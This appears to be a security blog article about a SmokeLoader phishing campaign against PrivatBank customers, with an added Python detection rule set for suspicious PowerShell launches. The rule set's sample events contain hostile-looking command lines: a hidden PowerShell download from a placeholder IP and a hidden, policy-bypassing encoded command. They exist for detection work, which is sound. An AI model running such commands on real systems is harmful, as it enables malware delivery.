PrivatBank hit by SmokeLoader malware in phishing attack
In a recent cyber threat targeting Ukraine's financial sector, attackers launched a large-scale phishing attack against customers of the country's largest state-owned bank, PrivatBank. Cybercriminals deployed the SmokeLoader malware, a well-known and dangerous tool, to establish backdoors on infected systems and download additional malicious software. The attack demonstrated a remarkable level of sophistication and was first discovered by cybersecurity firm CloudSEK, which analyzed the tactics and targeting of the campaign.
How the SmokeLoader malware attack unfolded
The attack was executed through a targeted phishing campaign, where victims received fraudulent emails containing malicious attachments. These attachments were typically password-protected ZIP or RAR files containing JavaScript, VBScript, or LNK files (Windows shortcut files), which manipulated the execution flow to initiate the attack.
When a user opened the archive and entered the provided password, a series of malicious actions were triggered:
- Code injection: The malicious script injected harmful code into a legitimate Windows process, such as wscript.exe, to evade security systems.
- PowerShell commands: A hidden PowerShell command was activated, typically performing two tasks:
  - A legitimate-looking PDF document or other decoy file was opened to divert the user's suspicion.
  - A hidden process was initiated, contacting a remote Command-and-Control (C2) server and downloading the SmokeLoader malware.
- SmokeLoader activation: Once SmokeLoader was installed, it acted as a downloader for additional malicious software, including trojans, keyloggers, and ransomware.
Recently, a new variant of this attack has been observed, where attackers use Windows shortcut files (LNK files) as decoys. When a user opens such a file, a hidden PowerShell command is executed, fetching and running the malware directly from the hacker’s server.
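As an added illustration (not code from CloudSEK's report or from the original post), the following Python rule set scores process-creation events against the chain described above: a script host such as wscript.exe launching a hidden PowerShell that downloads a payload, or, for the LNK variant, an Explorer-launched PowerShell with a hidden window and an encoded command. The events, URL, paths and encoded string are constructed samples in the shape of Sysmon Event ID 1 fields; the indicator names and the two-indicator threshold are this example's own assumptions.

```python
import re
from pathlib import PureWindowsPath
from typing import Dict, List, Tuple

# Constructed sample events in the shape of Sysmon Event ID 1 (process creation) fields.
# The URL, paths and encoded string ("ABC" in UTF-16LE base64) are invented for this example.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {   # script host launches a hidden PowerShell that fetches a payload (stage 1 of the chain)
        "ParentImage": r"C:\Windows\System32\wscript.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r'powershell.exe -w hidden -nop -c "iwr http://203.0.113.5/x.bin -OutFile $env:TEMP\x.exe"',
    },
    {   # LNK variant: shortcut opened from Explorer runs an encoded, hidden PowerShell command
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -enc QQBCAEMA",
    },
    {   # benign administrative script: must not be flagged
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1",
    },
]

# Windows script hosts that should rarely spawn PowerShell on an end-user workstation.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}

# Command-line indicators drawn from the chain in the text; each is weak alone, so
# an event is only reported when at least two indicators co-occur.
COMMAND_LINE_RULES = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I),
    "encoded_command": re.compile(r"-e(?:nc(?:odedcommand)?|c)?\s+[A-Za-z0-9+/=]{4,}", re.I),
    "policy_bypass": re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I),
    "download_primitive": re.compile(r"\b(?:iwr|invoke-webrequest|downloadstring|downloadfile|start-bitstransfer)\b", re.I),
    "remote_url": re.compile(r"https?://", re.I),
}

def indicators(event: Dict[str, str]) -> List[str]:
    """Return the names of every indicator the event matches, in a stable order."""
    parent = PureWindowsPath(event.get("ParentImage", "")).name.lower()
    child = PureWindowsPath(event.get("Image", "")).name.lower()
    hits = ["script_host_parent"] if child == "powershell.exe" and parent in SCRIPT_HOSTS else []
    command_line = event.get("CommandLine", "")
    hits.extend(name for name, rule in COMMAND_LINE_RULES.items() if rule.search(command_line))
    return hits

def triage(events: List[Dict[str, str]], threshold: int = 2) -> List[Tuple[int, List[str]]]:
    """Return (event index, matched indicators) for every event at or above the threshold."""
    return [(i, hits) for i, event in enumerate(events) if len(hits := indicators(event)) >= threshold]
```

Run against real Sysmon exports, the same two functions work on any list of dicts carrying the ParentImage, Image and CommandLine fields; the benign third event shows why a single indicator should not page anyone.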
Initial infection: Phishing attacks
Phishing attacks are a prevalent method employed by threat actors to disseminate SmokeLoader malware. These attacks typically involve sending emails with malicious attachments or links that, when opened or clicked, download the malware onto the victim’s device. The emails often appear to be legitimate, making it challenging for Windows users to distinguish them from genuine messages.
To protect against phishing attacks, it is crucial to exercise caution when receiving unsolicited emails, especially those containing attachments or links. Utilizing robust antivirus software can help detect and block malicious emails. Additionally, keeping the operating system and all software up to date is essential to prevent the exploitation of vulnerabilities that may be leveraged in phishing attacks.
SmokeLoader malware: Indicators of compromise
SmokeLoader is a well-known and notorious malware family that has been active since 2011. It is primarily used to infiltrate computers and download other malware, including trojans, keyloggers, and ransomware, and it is known for its advanced evasion techniques, including:
- Hiding within legitimate software
- Dynamically modifying its code to evade antivirus detection
- Manipulating system processes to bypass security tools
CloudSEK's research also revealed that hackers are exploiting a known vulnerability in 7-Zip, a popular open-source file archiver developed by Russian programmer Igor Pavlov. The vulnerability, identified as CVE-2025-0411, was discovered by researchers at Tokyo-based Trend Micro in September and patched two months later. This delay gave hackers ample time to exploit the vulnerability in the wild. SmokeLoader can also install password stealers, which are designed to capture and transmit sensitive information such as login credentials.
Malware behavior: PROPagate injection technique
SmokeLoader employs the sophisticated PROPagate injection technique to inject malicious code into legitimate Windows processes. This technique exploits the Windows SetWindowSubclass function to insert code into other running processes, allowing the malware to mask its activity and leverage the permissions and capabilities of the infected process.
The PROPagate injection technique is a highly advanced method used by SmokeLoader to evade detection and analysis. To counter such sophisticated techniques, it is essential to have advanced threat intelligence and security measures in place, ensuring that malicious activities are detected and prevented promptly.
Connection to UAC-0006 and FIN7 threat actors
Cybersecurity experts believe this attack may have been carried out by UAC-0006, a cybercriminal group that has been active for several years. In this particular sample of the attack, the methods used closely resemble those previously employed by the group. The group has previously been linked to attacks on financial institutions in Ukraine.
The methods used in this attack also resemble tactics previously employed by the Russian-linked hacker group FIN7 (also known as Carbanak or Anunak). FIN7 specializes in cybercrime targeting banks and retail businesses worldwide and is known for its sophisticated phishing campaigns.
Communication and C2: Encrypted C2s
SmokeLoader malware utilizes encrypted command and control (C2) servers to communicate with its operators. The malware employs a custom XOR-based decryption algorithm to decrypt the list of encrypted C2s, a mechanism designed to prevent other hackers from creating a builder that patches samples with new C2s.
The use of encrypted C2s makes it challenging to track and disrupt SmokeLoader’s communication with its operators. However, security researchers and threat intelligence teams can analyze the malware’s communication patterns and indicators of compromise (IOCs) to identify and block malicious activity effectively.
What threat do phishing attacks pose?
The attack on PrivatBank is part of a larger trend where cybercriminals target critical infrastructure in Ukraine. SmokeLoader often facilitates the distribution of other malware families, increasing the overall threat level. SmokeLoader provides attackers with a backdoor into the victim's computer, which can lead to:
- Financial theft: Hackers can gain access to sensitive banking information and carry out unauthorized transactions.
- Data collection: Cybercriminals can monitor user activity and steal personal data.
- Ransomware attacks: SmokeLoader can download ransomware that encrypts the victim's files and demands a ransom.
The recent increase in SmokeLoader infections highlights the need for advanced detection technologies to combat these threats.
How to protect against SmokeLoader attacks
To reduce the risk of falling victim to this type of attack, both organizations and individuals should implement the following security measures:
- Be skeptical of emails from unknown senders: Never open attachments from suspicious sources.
- Use multi-factor authentication (MFA): This can prevent attackers from accessing accounts even if login credentials are compromised.
- Keep software updated: Ensure that all systems, including antivirus programs, are up to date to protect against known vulnerabilities.
- Utilize advanced security tools: Implement intrusion detection systems (IDS) and endpoint detection and response (EDR) to detect suspicious activity. Understanding the Process Environment Block (PEB) can help in identifying and mitigating malware that dynamically accesses system libraries during runtime.
- Limit user access rights: Apply the principle of least privilege, ensuring users only have access to necessary systems and data.
- Monitor network traffic: Watch for unusual connections to known Command-and-Control servers.
Conclusion
The attack on PrivatBank highlights the growing threat cybercriminals pose to financial institutions, especially in wartime Ukraine, where state-backed hackers are frequently active. With increasingly sophisticated attack methods, organizations must take cybersecurity seriously and implement robust defense mechanisms.
The latest SmokeLoader attack is yet another reminder of the importance of staying vigilant against phishing threats and having strong security measures in place. If your organization has not yet implemented comprehensive security strategies, now is the time to elevate your cybersecurity posture.

Sarah Krarup
Sarah studies innovation and entrepreneurship with a deep interest in IT and how cybersecurity impacts businesses and individuals. She has extensive experience in copywriting and is dedicated to making cybersecurity information accessible and engaging for everyone.